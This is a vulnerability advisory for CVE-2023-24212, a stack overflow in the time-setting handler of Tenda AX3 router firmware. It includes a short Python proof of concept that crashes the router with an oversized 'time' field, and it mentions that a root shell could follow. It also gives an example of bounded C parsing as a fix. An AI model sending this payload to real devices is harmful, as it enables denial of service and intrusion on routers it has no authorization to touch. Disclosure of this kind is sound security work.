Tenda AX3 V16.03.12.11 Stack overflow vulnerability

CVE-2023-24212

Firmware information

Affected version

Vulnerability details

In the /goform/SetSysTimeCfg handler, the user first passes in timeType. When timeType is manual, the user can also pass in time, and sscanf is then used to assign the value of time to v14~v27. Notably, there is no size check, which leads to a stack overflow vulnerability.
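One way to parse the time field with a length check and bounded conversions, as an added example (not Tenda's code and not part of the original advisory). The function name, the struct and the `YYYY-MM-DD HH:MM:SS` layout are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Added example: struct, function name and the "YYYY-MM-DD HH:MM:SS"
 * layout are assumptions, not taken from the Tenda firmware. */
struct sys_time { int year, mon, day, hour, min, sec; };

#define TIME_STR_MAX 19 /* strlen("2023-01-15 12:30:45") */

/* Returns 0 and fills *out on success, -1 if the input is rejected. */
int parse_sys_time(const char *in, struct sys_time *out)
{
    struct sys_time t;
    int used = 0;
    size_t len;

    if (in == NULL || out == NULL)
        return -1;

    /* Size check first: anything longer than the fixed layout is refused. */
    len = strlen(in);
    if (len > TIME_STR_MAX)
        return -1;

    /* Every conversion has a field width and targets an int, so sscanf
     * never copies an unbounded string into a fixed stack buffer. */
    if (sscanf(in, "%4d-%2d-%2d %2d:%2d:%2d%n", &t.year, &t.mon, &t.day,
               &t.hour, &t.min, &t.sec, &used) != 6)
        return -1;
    if ((size_t)used != len) /* trailing bytes after the seconds field */
        return -1;

    /* Range checks also reject signed values accepted by %d. */
    if (t.year < 1970 || t.mon < 1 || t.mon > 12 || t.day < 1 || t.day > 31 ||
        t.hour < 0 || t.hour > 23 || t.min < 0 || t.min > 59 ||
        t.sec < 0 || t.sec > 59)
        return -1;

    *out = t;
    return 0;
}

int main(void)
{
    struct sys_time t;
    printf("%d\n", parse_sys_time("2023-01-15 12:30:45", &t));
    return 0;
}
```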

PoC

import requests

url = "http://192.168.0.1/goform/SetSysTimeCfg"

timeType = "manual"

time = "2023-01-15 "
time += "a" * 0x2000

r = requests.post(url, data={'timeType': timeType, 'time': time})
print(r.content)

After sending the request, you can see the router crash; finally, you can write an exploit to get a root shell.